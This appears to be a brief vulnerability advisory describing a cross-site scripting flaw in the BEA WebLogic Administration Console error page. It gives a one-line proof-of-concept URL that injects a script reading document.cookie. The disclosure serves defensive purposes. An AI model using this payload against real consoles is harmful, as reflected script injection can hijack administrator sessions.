BEA WebLogic Administration Console Error Page Cross-Site Scripting Vulnerability

BEA WebLogic Administration Console Error Page Cross-Site Scripting Vulnerability

An exploit is not required.

The following proof of concept example is available:

http://www.example.com:7001/console/a?=<script>alert(document.cookie)</script>